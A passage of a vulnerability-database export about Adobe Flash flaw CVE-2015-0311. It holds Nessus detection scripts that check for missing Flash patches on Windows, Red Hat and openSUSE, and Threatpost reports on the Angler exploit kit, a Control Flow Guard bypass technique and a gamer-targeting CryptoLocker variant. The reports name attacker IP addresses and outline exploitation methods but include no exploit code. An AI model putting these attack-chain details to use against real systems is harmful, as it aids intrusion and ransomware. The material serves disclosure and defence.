files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"16.0.0.296 / 13.0.0.264\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = 
\"16.0.0.296 / 13.0.0.264\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 16.0.0.296 (Chrome PepperFlash)';\n else\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:05:13", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB15-02, and APSB15-03, listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. 
(CVE-2015-0310, CVE-2015-0311,\nCVE-2015-0312)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.440.", "edition": 28, "published": "2015-01-28T00:00:00", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2015:0094)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312", "CVE-2015-0310"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2015-0094.NASL", "href": "https://www.tenable.com/plugins/nessus/81036", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0094. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81036);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-0310\", \"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283);\n script_xref(name:\"RHSA\", value:\"2015:0094\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2015:0094)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. 
Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB15-02, and APSB15-03, listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2015-0310, CVE-2015-0311,\nCVE-2015-0312)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.440.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-03.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0094\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0311\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0310\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0094\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.440-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.440-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to 
RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T11:12:28", "description": "Adobe Flash Player was updated to 11.2.202.440 (bsc#914463) :\n\n - APSA15-01, CVE-2015-0311\n\n - Update of flashplayer (executable binary) for i386 is\n not available. 
This binary was disabled.\n\n - Security update to 11.2.202.438 (bsc#914333) :\n\n - APSB15-02, CVE-2015-0310\n\n - Security update to 11.2.202.429 (bsc#913057) :\n\n - APSB15-01, CVE-2015-0301, CVE-2015-0302, CVE-2015-0303,\n CVE-2015-0304, CVE-2015-0305, CVE-2015-0306,\n CVE-2015-0307, CVE-2015-0308, CVE-2015-0309.\n\n - Disable flash player on machines without SSE2\n (bnc#856386).\n\n - Remove outdated README and keep only up-to-date\n readme.txt.", "edition": 17, "published": "2015-01-30T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2015:0174-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0303", "CVE-2015-0305", "CVE-2015-0304", "CVE-2015-0308", "CVE-2015-0301", "CVE-2015-0309", "CVE-2015-0302", "CVE-2015-0311", "CVE-2015-0307", "CVE-2015-0306", "CVE-2015-0310"], "modified": "2015-01-30T00:00:00", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:flash-player-kde4", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player"], "id": "OPENSUSE-2015-81.NASL", "href": "https://www.tenable.com/plugins/nessus/81098", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-81.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81098);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2015-0301\", \"CVE-2015-0302\", \"CVE-2015-0303\", \"CVE-2015-0304\", \"CVE-2015-0305\", \"CVE-2015-0306\", \"CVE-2015-0307\", \"CVE-2015-0308\", \"CVE-2015-0309\", \"CVE-2015-0310\", \"CVE-2015-0311\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2015:0174-1)\");\n script_summary(english:\"Check for the openSUSE-2015-81 patch\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to 11.2.202.440 (bsc#914463) :\n\n - APSA15-01, CVE-2015-0311\n\n - Update of flashplayer (executable binary) for i386 is\n not available. This binary was disabled.\n\n - Security update to 11.2.202.438 (bsc#914333) :\n\n - APSB15-02, CVE-2015-0310\n\n - Security update to 11.2.202.429 (bsc#913057) :\n\n - APSB15-01, CVE-2015-0301, CVE-2015-0302, CVE-2015-0303,\n CVE-2015-0304, CVE-2015-0305, CVE-2015-0306,\n CVE-2015-0307, CVE-2015-0308, CVE-2015-0309.\n\n - Disable flash player on machines without SSE2\n (bnc#856386).\n\n - Remove outdated README and keep only up-to-date\n readme.txt.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=856386\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=913057\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=914333\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=914463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2015-01/msg00086.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe 
Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-11.2.202.440-2.115.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE12.3\", reference:\"flash-player-gnome-11.2.202.440-2.115.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-kde4-11.2.202.440-2.115.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:57:30", "bulletinFamily": "info", "cvelist": ["CVE-2015-0311"], "description": "Adobe on Saturday began patching a zero-day vulnerability in Flash Player, exploits for which have been included in the notorious Angler Exploit Kit. This is the second of two previously unreported critical flaws in the software that have been patched in the last five days.\n\nAdobe last Thursday sent out an [emergency patch for another zero-day under attack](<http://threatpost.com/adobe-patches-one-zero-day-in-flash-still-investigating-separate-vulnerability/110586>) for a vulnerability that could be used to defeat memory protections on Windows machines.\n\nThe second vulnerability, CVE-2015-0311, was reported by French researcher Kafeine, known for his work studying exploit kits and malware used in cybercrime and targeted attacks. The flaw affects Adobe Flash versions 16.0.0.287 and earlier on Windows and Mac OS X machines. 
Adobe said it is aware of active exploits via drive-by download attacks against Windows 8.1 and earlier machines running IE or Firefox.\n\n\u201cSuccessful exploitation could cause a crash and potentially allow an attacker to take control of the affected system,\u201d Adobe said in an [advisory](<http://helpx.adobe.com/security/products/flash-player/apsa15-01.html>).\n\nOn Saturday, Adobe released the patch for users who have enabled auto-update for Flash Player desktop runtime. Those users began getting the fix via version 16.0.0.296.\n\n\u201cAdobe expects to have an update available for manual download during the week of January 26, and we are working with our distribution partners to make the update available in Google Chrome and Internet Explorer 10 and 11,\u201d Adobe said.\n\nAs of this morning, a manual download is still not available from Adobe.\n\n\u201cAs a matter of fact, Adobe still lists 16.0.0.287 as the most recent version,\u201d said Johannes Ullrich of the SANS Internet Storm Center. \u201cYou can download 16.0.0.296 if you manually check for updates using Flash.\u201d\n\nThe inclusion of CVE-2015-0311 in the Angler Exploit Kit is worrisome because it increases the odds that vulnerable machines will be attacked before a patch is available. Kafeine said only some instances of the exploit kit, however, contain the exploit.\n\nLast Thursday, Kafeine said on Twitter that the group behind Angler had changed the code to exploit Firefox as well as fully patched IE 11 on Windows 8.1. The Flash zero-day exploit is being used to install a version of the Bedep malware, which is used in ad fraud campaigns.\n\n> One last bad news : Windows 8.1 Internet Explorer 11 fully updated is now owned as well. 
[pic.twitter.com/TgIMVoXliU](<http://t.co/TgIMVoXliU>)\n> \n> \u2014 Kafeine (@kafeine) [January 22, 2015](<https://twitter.com/kafeine/status/558272193797566464>)\n\nResearchers at Cisco, meanwhile, said that security engineers should expect this trend of Flash zero days finding their way into exploit kits to continue.\n\n\u201cThe group is incorporating these exploits into the Angler EK before the bugs are publicized,\u201d researchers Nick Biasini, Earl Carter and Jaeson Schultz wrote in a [report](<http://blogs.cisco.com/security/talos/angler-flash-0-day>) published on Friday. \u201cConsidering these 0-day exploits are being used alongside one of Angler\u2019s preferred methods of distribution, malvertising, thus intensifying the potential for large-scale compromise.\u201d\n\nCisco said its data shows the Angler exploit for Flash is targeting only IE and Firefox, while Chrome is being served only other exploits. The researchers report a spike in Angler attacks starting Jan. 20.\n\n\u201cAlthough this spike showed an increase in Angler related attacks, these attacks represent a small minority of the overall attack traffic. Based on our telemetry data we have seen domains associated with a single registrar being primarily responsible for the exploits being delivered,\u201d the Cisco report said. \u201cThe approach appears to be rapid domain registration and exploitation with quick rotation of domains. 
Despite the rapid use of domains the IP\u2019s associated with the attacks have been limited to two primary addresses (46[.]105.251.7 & 94[.]23.247.180).\u201d\n\nThe domains, Cisco said, are used for only 24 hours, and the attackers continue to register new domains daily.\n", "modified": "2015-01-28T21:51:16", "published": "2015-01-26T11:17:58", "id": "THREATPOST:35208BBC851328DC905D9D0B81BCDC6B", "href": "https://threatpost.com/adobe-begins-auto-update-patching-of-second-flash-player-zero-day/110640/", "type": "threatpost", "title": "Adobe Auto-Update Flash Player Zero Day Patch", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:14", "bulletinFamily": "info", "cvelist": ["CVE-2015-0311"], "description": "Introduced in Windows 8.1 Update 3 and Windows 10, Control Flow Guard was Microsoft\u2019s latest antidote to memory-corruption attacks. The technology was meant to stand up to attacks that had long ago figured out how to bypass previous-generation protections such as Address Space Layout Randomization (ASLR) and Data Execution Protection (DEP).\n\nHowever, as every new security wall is put up, researchers and hackers alike try to find ways over, under or through it.\n\nControl Flow Guard is no exception.\n\nOn Friday, at DerbyCon in Louisville, Ky., researcher Jared DeMott of Bromium is expected to deliver a talk on a CFG bypass. 
DeMott told Threatpost that Bromium disclosed the technique to Microsoft before Black Hat, but the company has decided not to fix it and that it was [not worthy of a bounty](<https://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876/>).\n\nMicrosoft declined to comment; DeMott said Microsoft told Bromium the bypass doesn\u2019t affect all systems and that it would be a difficult attack vector to exploit.\n\n\u201cThey said it really only affects 32-bit apps running on 64-bit machines, and that it doesn\u2019t affect all systems,\u201d DeMott said. \u201cMy response to them was that IE runs as 32-bit by default on 64-bit Windows and this still fully affects the browser.\u201d\n\nDeMott said that his bypass takes advantage of Microsoft\u2019s choice not to deploy [Control Flow Integrity](<https://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876/>) over Control Flow Guard.\n\n\u201cWhen Control Flow Integrity is implemented, it adds extra checks before a function pointer call is made and a return address is returned, making those the only valid places to return to,\u201d DeMott said. \u201cMicrosoft didn\u2019t feel it was necessary to fully implement Control Flow Integrity; Control Flow Guard protects function pointers only, not return addresses.\u201d\n\nControl Flow Guard, which is a Visual Studio technology, was also built into Microsoft\u2019s new Edge Browser, which made its debut earlier this summer. 
A previous [bypass of CFG](<https://blog.coresecurity.com/2015/03/25/exploiting-cve-2015-0311-part-ii-bypassing-control-flow-guard-on-windows-8-1-update-3/>) was disclosed in March by researchers at Core Security.\n\n\u201c[CFG] compiles checks around code that does indirect jumps based on a pointer, restricting these jumps to only jump to function entry points that have had their address taken,\u201d Microsoft wrote in a [report](<http://blogs.windows.com/msedgedev/2015/05/11/microsoft-edge-building-a-safer-browser/>) explaining the [security features of the Edge browser](<https://threatpost.com/microsoft-edge-browser-seen-as-a-big-security-upgrade/112738/>). \u201cThis makes attacker take-over of a program much more difficult by severely constraining where a memory corruption attack can jump to.\u201d\n\nThe key to DeMott\u2019s bypass, he said, is the ability to corrupt a return address and kick off a series of events leading to a return-oriented programming (ROP) chain that is central to so many memory-corruption attacks. The Bromium technique is called Stack Desync and relies on the use of different function calling conventions, he said.\n\n\u201cIf you mix and match them, when you call a function pointer and the system expects a standard convention, but gets another, the stack desyncs and returns an arbitrary address,\u201d DeMott said. \u201cIf you don\u2019t protect the return addresses, the model is broken.\n\n\u201cIf you don\u2019t protect the return address, you\u2019re leaving exposed the ability for something like what we\u2019re doing. It\u2019s possible to shuffle things around on the stack so that a call will return, not to a valid address, but to the start of an attack instead.\u201d\n\nSuch a bypass is not trivial to pull off and is likely the playground of a nation-state or intelligence-agency backed operation. 
The attack provides a point of entry onto a network, opening the door to secondary attacks leading to data loss or privilege escalation.\n\n\u201cThis is the next evolution of the typical cat-and-mouse game that is memory corruption,\u201d DeMott said. \u201cAll this research, even though it sounds bad, it\u2019s pushing the ball forward and raises the bar for attackers. [Microsoft] chose not to fix it and felt like they did the best they could with it and not fully repair it. There\u2019s some slight risk here and the technique we used doesn\u2019t exist everywhere.\u201d\n", "modified": "2015-09-28T19:05:16", "published": "2015-09-22T15:00:11", "id": "THREATPOST:15B31341E263EF985C14F77A30F1799F", "href": "https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/", "type": "threatpost", "title": "Control Flow Guard Mitigation Bypass", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:25", "bulletinFamily": "info", "cvelist": ["CVE-2015-0311"], "description": "When the Blackhole exploit kit went away after the arrest of its alleged creator and maintainer Paunch, there were questions about [which kit would rise up as its successor](<http://threatpost.com/viable-blackhole-successor-could-take-years-to-emerge/103492>).\n\nIt seems that the Angler exploit kit has ascended to the throne.\n\nThe most definitive evidence seems to be the constant updating of the kit with a bevy of zero-day exploits for Adobe Flash Player. 
Researchers at Cisco\u2019s Talos group today published a [report](<http://blogs.cisco.com/talos/angler-variants>) on the most recent Angler Flash zero day ([CVE-2015-0311](<https://helpx.adobe.com/security/products/flash-player/apsa15-01.html>)) discovered in the kit by French researcher Kafeine.\n\nCisco\u2019s Nick Biasini said 1,800 domains have been compromised by this exploit, and have been used by five IP addresses: 85.25.107.126, 207.182.149.14, 178.32.131.248, 178.32.131.185, and 85.25.107.127.\n\n\u201cThese domains are associated with the landing page and exploits,\u201d Biasini said. \u201cNone of the actual root domains appear to be compromised and are legitimately registered to owners.\u201d\n\nThe latest Angler/Flash campaign hit its peak Jan. 28 and 29 with almost 1,400 infections over that 48-hour period before tapering off two days later.\n\n\u201cThere are enough of these domains that some of them are only seen once before being abandoned. The majority of the compromised domains are registered through GoDaddy and it appears that 50+ accounts have been compromised,\u201d he said. \u201cMany of these accounts control multiple domains with some controlling 45+ unique domains.\u201d\n\nCisco published a small sample of sub-domains involved in these attacks that were registered to one domain, all of them resolving to one IP address, Biasini said. Another set of subdomains, he said, acts as the initial redirection page. The attackers are using malicious online advertisements to serve the exploits, with those pointing to compromised subdomains. Those sites redirect to another subdomain that serves up a landing page and either Flash or Microsoft Silverlight exploits, also included in the Angler kit.\n\nMost of the hashes have low detection rates, Cisco said.\n\n
\u201cThis is another example of how Angler Exploit Kit continues to differentiate itself. It changes and evolves on a constant basis producing new variation on the existing exploits as well as providing enough customization on the recent vulnerability (CVE-2015-0311) to effectively avoid reliable detection,\u201d Biasini said. \u201cIf the first month of 2015 is any indication, the Angler Exploit Kit could have a big year.\u201d\n\nKafeine spotted the Flash zero day exploit code in Angler on Jan. 20, and it was [installing click-fraud malware known as Bedep](<http://threatpost.com/exploit-for-flash-zero-day-appears-in-angler-exploit-kit/110569>), also installed by older versions of Angler. Further analysis by researchers at Websense revealed that the zero-day exploit could inject malicious payloads into users\u2019 browsers. The exploit code was hidden among [several layers of obfuscation](<http://threatpost.com/analysis-of-flash-zero-day-shows-layers-of-obfuscation/110674>) in order to keep it from being detected.\n\nAdobe released a patch for customers who had enabled auto-update for Flash on the desktop on Jan. 24 before releasing an out-of-band patch two days later. 
On Monday, another unrelated [Flash zero day](<http://threatpost.com/another-flash-zero-day-emerges/110786>), the third in two weeks, was patched in another emergency update.\n", "modified": "2015-02-05T19:15:23", "published": "2015-02-03T14:27:13", "id": "THREATPOST:9009527D58E12C6B44AB69AD73844FDA", "href": "https://threatpost.com/1800-domains-overtaken-by-flash-zero-day/110835/", "type": "threatpost", "title": "1,800 Domains Overtaken by Flash Zero Day", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:13", "bulletinFamily": "info", "cvelist": ["CVE-2013-2551", "CVE-2015-0311"], "description": "Gamers may soon be feeling the pain of crypto-ransomware.\n\nA variant of CryptoLocker is in the wild that goes after data files associated with 20 different online games, locking downloadable content in an attempt to target younger computer users.\n\nResearchers at Bromium today said an unnamed compromised website is serving the malware. Victims are redirected by a Flash exploit to a site hosting the Angler exploit kit, and Angler drops the CryptoLocker variant.\n\n\u201cThe website is based on WordPress and could have been compromised by any one of the numerous WP exploits,\u201d wrote Vadim Kotov in an [advisory](<http://labs.bromium.com/2015/03/12/achievement-locked-new-crypto-ransomware-pwns-video-gamers/>) for Bromium. \u201cAdditionally, the URL where the malicious Flash file is hosted keeps changing.\u201d\n\nKotov said the attackers forgo typical iframe redirects and instead use a Flash file wrapped in an invisible div tag, likely in an attempt to evade detection. 
The malware proceeds through a number of checks for the presence of virtual machines or antivirus before dropping a Flash exploit for CVE-2015-0311 or an Internet Explorer exploit for CVE-2013-2551.\n\nThe malware behaves like a typical CryptoLocker infection, presenting the victim with a banner explaining that files have been encrypted, and a ransom must be paid with Bitcoin in order for a decryption key to be sent to the victim. There are also instructions to make payments over Tor if the decryption site is not working.\n\nMore than 50 file extensions associated with video games are targeted by this variant, in addition to images, documents, iTunes files and more. A number of popular single-player games including Call of Duty, Minecraft, Half Life 2, Elder Scrolls, Skyrim, Assassin\u2019s Creed and others are affected, as are online games such as World of Warcraft, Day Z and League of Legends, as well as a number of EA Sports, Valve and Bethesda games. Steam gaming software is also in the crosshairs, Bromium 